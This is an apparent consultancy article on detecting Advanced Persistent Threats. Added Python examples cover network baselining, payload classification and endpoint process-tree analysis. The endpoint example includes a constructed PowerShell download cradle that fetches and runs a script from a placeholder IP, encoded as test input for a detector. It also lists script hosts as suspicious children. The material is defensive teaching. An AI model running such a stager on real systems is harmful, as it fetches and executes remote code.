Detecting an Advanced Persistent Threat

Today the threat landscape has changed. Attackers have grown smarter and better resourced, and organizations now face a much larger threat: the Advanced Persistent Threat (APT), an adversary who gains a foothold and stays in the network for months rather than a single smash-and-grab intrusion.

There is no rulebook that attackers follow to break into a system. An organization must therefore follow a security and monitoring framework that ensures all of its boundaries and threat areas are covered. The challenge today is not only to detect and remediate an advanced persistent threat, but to do so in a timely manner, before the attacker has finished what they came for.

There are three basic areas which need to be monitored and analysed to detect an Advanced Persistent Threat:
1. Network Traffic Analysis
2. Payload Analysis
3. Endpoint Behaviour Analysis

Network Traffic Analysis:
Network traffic is one of the most important data sources an organization needs to analyse to detect a threat or a break-in. By analysing inbound and outbound traffic, a compromised system or network segment can be identified from its traffic patterns: for example unusual outbound volume, connections to destinations never seen before, or connections repeated at regular intervals. Based on normal usage, a baseline of all activity should be created and compared against real-time events to detect anomalies.

To strengthen this further, network forensics is an activity an organization should invest in. Forensics captures, stores and analyses network traffic (full packet capture or flow records) and provides the analytics needed to improve detection and remediation. Retained traffic is also what lets an analyst reconstruct what an intruder did after the alert fires.
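The baseline-and-anomaly approach described above, as an added example that is not part of the original article. It builds a per-host baseline from constructed flow records (bytes sent per flow and destinations seen), then scores "real-time" flows for three APT-style deviations: outbound volume far above the host's norm, destinations the host never contacted before, and regular-interval connections (beaconing). The z-score, minimum beacon count and jitter thresholds are illustrative assumptions; real command-and-control channels often add random jitter, so the interval test is one signal to combine with others, not a verdict on its own.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Constructed flow records (not real data): (timestamp_s, src_host, dst_ip, dst_port, bytes_out)
BASELINE_FLOWS = [
    (0,   "ws-01", "10.0.0.5",     445, 2_000),
    (60,  "ws-01", "203.0.113.10", 443, 15_000),
    (120, "ws-01", "10.0.0.5",     445, 3_000),
    (180, "ws-01", "203.0.113.10", 443, 12_000),
    (240, "ws-01", "203.0.113.10", 443, 18_000),
    (0,   "ws-02", "203.0.113.10", 443, 8_000),
    (100, "ws-02", "10.0.0.5",     445, 1_500),
    (200, "ws-02", "203.0.113.10", 443, 9_000),
]

# Constructed "real-time" flows containing one beaconing host and one bulk transfer.
LIVE_FLOWS = [
    (1000, "ws-01", "203.0.113.10", 443, 14_000),       # normal web traffic
    (1000, "ws-02", "198.51.100.7", 443, 1_200),        # beacon every 300 s ...
    (1300, "ws-02", "198.51.100.7", 443, 1_190),
    (1600, "ws-02", "198.51.100.7", 443, 1_210),
    (1900, "ws-02", "198.51.100.7", 443, 1_200),
    (2000, "ws-01", "198.51.100.7", 443, 950_000_000),  # bulk transfer to a new destination
]


def build_baseline(flows):
    """Per-host mean/stdev of bytes_out per flow and the set of (dst, port) pairs seen."""
    bytes_per_host = defaultdict(list)
    dests_per_host = defaultdict(set)
    for _ts, src, dst, dport, nbytes in flows:
        bytes_per_host[src].append(nbytes)
        dests_per_host[src].add((dst, dport))
    return {
        host: {"mean": mean(vals), "stdev": pstdev(vals), "dests": dests_per_host[host]}
        for host, vals in bytes_per_host.items()
    }


def detect_anomalies(baseline, live, z=3.0, min_beacons=4, max_jitter=0.1):
    """Return (kind, src, dst, dport) alerts for volume outliers, unseen destinations
    and regular-interval beaconing. Thresholds are illustrative assumptions."""
    alerts = []
    reported_new = set()
    for _ts, src, dst, dport, nbytes in live:
        base = baseline.get(src)
        if base is None:
            # A host with no baseline cannot be scored; flag it for review.
            alerts.append(("unknown-host", src, dst, dport))
            continue
        if (dst, dport) not in base["dests"] and (src, dst, dport) not in reported_new:
            reported_new.add((src, dst, dport))
            alerts.append(("new-destination", src, dst, dport))
        if nbytes > base["mean"] + z * base["stdev"]:
            alerts.append(("volume", src, dst, dport))

    # Beaconing: several connections to the same (dst, port) with near-constant spacing.
    times_per_conn = defaultdict(list)
    for ts, src, dst, dport, _nbytes in live:
        times_per_conn[(src, dst, dport)].append(ts)
    for (src, dst, dport), times in times_per_conn.items():
        if len(times) < min_beacons:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        # Coefficient of variation of the gaps: 0 means perfectly regular.
        if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
            alerts.append(("beacon", src, dst, dport))
    return alerts


if __name__ == "__main__":
    for alert in detect_anomalies(build_baseline(BASELINE_FLOWS), LIVE_FLOWS):
        print(alert)
```

Run as-is it reports the new destination for both hosts, the volume outlier on ws-01 and the beacon from ws-02, while the ordinary web traffic from ws-01 stays quiet. In production the baseline would be built per hour-of-day and per day-of-week rather than over all flows, because an APT's quiet weekend exfiltration is exactly what a flat daily average hides.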

Payload Analysis:
It is often very difficult to determine the actual extent of damage even after a compromise has been detected. Payload analysis examines the malware or the compromised system in more depth to study its behaviour and estimate the damage it could have caused. It also reduces false positives and increases the effectiveness of detection, and it is particularly effective against malware that bypasses signature-based verification, because a repacked or freshly compiled sample has a new hash but still has to perform the same actions to achieve its goal.

However, payload analysis is a time-consuming process. Moreover, sandboxing and replicating the exact target environment is a common challenge that all organisations face: malware that checks for a sandbox, waits for user interaction, or depends on software present only on the victim machine may behave differently during analysis than it did on the endpoint.
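The two preceding paragraphs, as an added example that is not part of the original article: a static signature check (SHA-256 against a known-bad list) combined with a behavioural score taken from a sandbox run, plus a byte-entropy check as a cheap hint that a sample is packed. The indicator names, their weights, the score threshold and the sample reports are all constructed assumptions for illustration, not any vendor's scoring; the point is that a sample with an unknown hash is still caught by what it does, a benign installer with one or two mundane behaviours is not flagged, and a packed sample that did almost nothing in the sandbox is handed to an analyst rather than auto-cleared.

```python
import hashlib
import math
from collections import Counter

# Constructed indicator weights (an illustrative assumption, not a vendor's scoring).
INDICATOR_WEIGHTS = {
    "persistence_run_key": 3,
    "process_injection": 4,
    "c2_beacon": 4,
    "credential_access": 4,
    "drops_executable": 1,
    "modifies_program_files": 1,
}
MALICIOUS_SCORE = 5   # two strong indicators, or one strong plus supporting ones
PACKED_ENTROPY = 7.0  # bits per byte; compressed or encrypted sections sit near 8

# Constructed "signature" database: SHA-256 of one known sample (filled in below).
KNOWN_BAD_SHA256 = set()


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def shannon_entropy(data):
    """Bits of entropy per byte; values near 8 suggest packing or encryption."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify_payload(payload, behaviours, threshold=MALICIOUS_SCORE):
    """Combine a static signature check with a behavioural score from a sandbox run.

    behaviours: names of behaviours observed in the sandbox (constructed report format).
    Returns (verdict, score); score is None when the signature alone decided.
    """
    if sha256_hex(payload) in KNOWN_BAD_SHA256:
        return "malicious (signature)", None
    score = sum(INDICATOR_WEIGHTS.get(b, 0) for b in behaviours)
    if score >= threshold:
        return "malicious (behaviour)", score
    if shannon_entropy(payload) >= PACKED_ENTROPY and score > 0:
        # Packed and doing something noteworthy: escalate instead of auto-clearing,
        # since a quiet sandbox run may mean evasion rather than innocence.
        return "suspicious", score
    return "benign", score


# --- constructed samples (stand-ins, not real malware) --------------------
KNOWN_SAMPLE = b"MZ" + b"old-known-dropper" * 8
KNOWN_BAD_SHA256.add(sha256_hex(KNOWN_SAMPLE))

# A stand-in for a packed payload: every byte value equally likely (entropy 8.0).
PACKED_UNKNOWN = bytes(range(256)) * 4
PACKED_REPORT = ["persistence_run_key", "c2_beacon"]        # score 7

# A legitimate installer: low-entropy bytes, only mundane behaviours.
INSTALLER = b"MZ" + b"\x00" * 512 + b"Setup" * 20
INSTALLER_REPORT = ["drops_executable", "modifies_program_files"]  # score 2

# A packed sample that did almost nothing in the sandbox (possible sandbox evasion).
EVASIVE = bytes(range(256)) * 2
EVASIVE_REPORT = ["drops_executable"]                       # score 1


if __name__ == "__main__":
    for name, data, report in [("known", KNOWN_SAMPLE, []),
                               ("packed-unknown", PACKED_UNKNOWN, PACKED_REPORT),
                               ("installer", INSTALLER, INSTALLER_REPORT),
                               ("evasive", EVASIVE, EVASIVE_REPORT)]:
        print(name, classify_payload(data, report))
```

The "suspicious" branch is where the sandbox-evasion caveat lands: a high-entropy sample that produced little in the sandbox is the case most likely to be a false negative, so it should never be auto-cleared on the strength of one short run.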

Endpoint Behaviour Analysis:
Endpoint Behaviour Analysis aims to detect any unwanted or suspicious activity on the endpoints themselves. This can be network activity originating from the endpoint, or an anomaly in application behaviour, such as a document viewer spawning a command interpreter or a process launched with an obfuscated command line.
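An added example of endpoint behaviour analysis over process-creation telemetry; it is not part of the original article. It checks two application-behaviour anomalies against constructed process events: an Office application as the parent of a command interpreter or script host (the classic macro-to-PowerShell chain), and a PowerShell command line carrying an -EncodedCommand payload, which it decodes (the payload is base64 over UTF-16LE) so the analyst sees what would have run. The event format, the process lists and the sample stager string are constructed assumptions; the same parent/child logic applies to whatever your EDR or Sysmon feed emits once the field names are mapped.

```python
import base64
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters and living-off-the-land binaries an Office app has no business launching.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
                       "mshta.exe", "rundll32.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_process_events(events):
    """Flag script hosts spawned by Office apps and encoded PowerShell command lines."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = image_name(parent["image"]) if parent else None
        if parent_name in OFFICE_APPS and name in SUSPICIOUS_CHILDREN:
            alerts.append({"kind": "office-spawns-script-host", "pid": e["pid"],
                           "parent": parent_name, "child": name})
        if name == "powershell.exe":
            decoded = decode_encoded_command(e["cmd"])
            if decoded is not None:
                alerts.append({"kind": "encoded-powershell", "pid": e["pid"],
                               "decoded": decoded})
    return alerts


# Constructed process-creation events (not real telemetry): pid, ppid, image, command line.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
_ENCODED = base64.b64encode(_STAGER.encode("utf-16-le")).decode()

EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmd": "WINWORD.EXE /n invoice.docm"},
    {"pid": 300, "ppid": 200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": f"powershell.exe -NoP -W Hidden -Enc {_ENCODED}"},
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c dir"},   # shell opened by the user from Explorer: not flagged
]

if __name__ == "__main__":
    for alert in analyse_process_events(EVENTS):
        print(alert)
```

Both alerts here land on the same process (pid 300), which is the point of correlating behaviours on the endpoint: either signal alone is occasionally legitimate, the two together on one process tree almost never are.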

One interesting technology is Application Containment. A suspicious or compromised application is allowed to keep running inside a container that isolates it from the rest of the data on the system. Its behaviour is monitored, and it is fed similar-looking decoy data so that its activity can be observed without exposing anything real. However, this is a resource-intensive process and often not very user-friendly.

As the threat scenario changes, information security is no longer the work of individuals. An enterprise-wide approach is needed, taking in all key stakeholders, management, business and IT, to achieve the collective goal of securing the organization.

Rahul Das
Consultant | Cyber Security
PwC, India
(IIITA, MS-CLIS 2011-2013)